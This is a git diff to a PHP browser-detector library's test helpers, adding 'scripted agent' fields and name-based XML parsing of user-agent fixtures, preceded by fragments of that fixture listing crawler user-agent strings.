Mozilla/5.0 (compatible; um-LN/1.0; mailto: techinfo@ubermetrics-technologies.com) + + + + Mozilla + 5.0 + unknown + unknown + unknown + unknown + Proximic + Spider + + Mozilla/5.0 (compatible; proximic; +http://www.proximic.com/info/spider.php) + + diff --git a/tests/BrowserDetector/Tests/_includes/UserAgentString.php b/tests/BrowserDetector/Tests/_includes/UserAgentString.php index 919e18e..90e898d 100644 --- a/tests/BrowserDetector/Tests/_includes/UserAgentString.php +++ 
b/tests/BrowserDetector/Tests/_includes/UserAgentString.php @@ -4,41 +4,53 @@ class UserAgentString { + const UNKNOWN = 'unknown'; + /** * @var string */ - private $browser; + private $browser = self::UNKNOWN; /** * @var string */ - private $browserVersion; + private $browserVersion = self::UNKNOWN; /** * @var string */ - private $os; + private $os = self::UNKNOWN; /** * @var string */ - private $osVersion; + private $osVersion = self::UNKNOWN; /** * @var string */ - private $device; + private $device = self::UNKNOWN; /** * @var string */ - private $deviceVersion; + private $deviceVersion = self::UNKNOWN; /** * @var string */ private $string; + /** + * @var string + */ + private $scriptedAgent = self::UNKNOWN; + + /** + * @var string + */ + private $scriptedAgentType = self::UNKNOWN; + /** * @return string */ @@ -178,4 +190,42 @@ public function setDeviceVersion($deviceVersion) return $this; } + + /** + * @return string scripted agent name stored for this user agent string + */ + public function getScriptedAgent() + { + return $this->scriptedAgent; + } + + /** + * @param string $scriptedAgent scripted agent name to store + * + * @return $this fluent return, matching the setDeviceVersion setter + */ + public function setScriptedAgent($scriptedAgent) + { + $this->scriptedAgent = $scriptedAgent; + return $this; + } + + /** + * @return string scripted agent type stored for this user agent string + */ + public function getScriptedAgentType() + { + return $this->scriptedAgentType; + } + + /** + * @param string $scriptedAgentType scripted agent type to store + * + * @return $this fluent return, matching the setDeviceVersion setter + */ + public function setScriptedAgentType($scriptedAgentType) + { + $this->scriptedAgentType = $scriptedAgentType; + return $this; + } } diff --git a/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php b/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php index 08ff5e6..7aba697 100644 --- a/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php +++ b/tests/BrowserDetector/Tests/_includes/UserAgentStringMapper.php @@ -13,16 +13,41 @@ public static function map() { $collection = array(); $xml = new SimpleXmlElement(file_get_contents(FILES . DIRECTORY_SEPARATOR . 
'UserAgentStrings.xml')); + foreach ($xml->strings->string as $string) { - $string = $string->field; $userAgentString = new UserAgentString(); - $userAgentString->setBrowser((string)$string[0]); - $userAgentString->setBrowserVersion((string)$string[1]); - $userAgentString->setOs((string)$string[2]); - $userAgentString->setOsVersion((string)$string[3]); - $userAgentString->setDevice((string)$string[4]); - $userAgentString->setDeviceVersion((string)$string[5]); - $userAgentString->setString(str_replace(array(PHP_EOL, ' '), ' ', (string)$string[6])); + foreach ($string->children() as $child) { + $attributes = $child->attributes(); + switch ($attributes['name']) { + case "browser": + $userAgentString->setBrowser((string)$child[0]); + break; + case "version": + $userAgentString->setBrowserVersion((string)$child[0]); + break; + case "os": + $userAgentString->setOs((string)$child[0]); + break; + case "os_version": + $userAgentString->setOsVersion((string)$child[0]); + break; + case "device": + $userAgentString->setDevice((string)$child[0]); + break; + case "device_version": + $userAgentString->setDeviceVersion((string)$child[0]); + break; + case "scripted_agent": + $userAgentString->setScriptedAgent((string)$child[0]); + break; + case "scripted_agent_type": + $userAgentString->setScriptedAgentType((string)$child[0]); + break; + case "string": + $userAgentString->setString(str_replace(array(PHP_EOL, ' '), ' ', (string)(string)$child[0])); + break; + } + } $collection[] = $userAgentString; }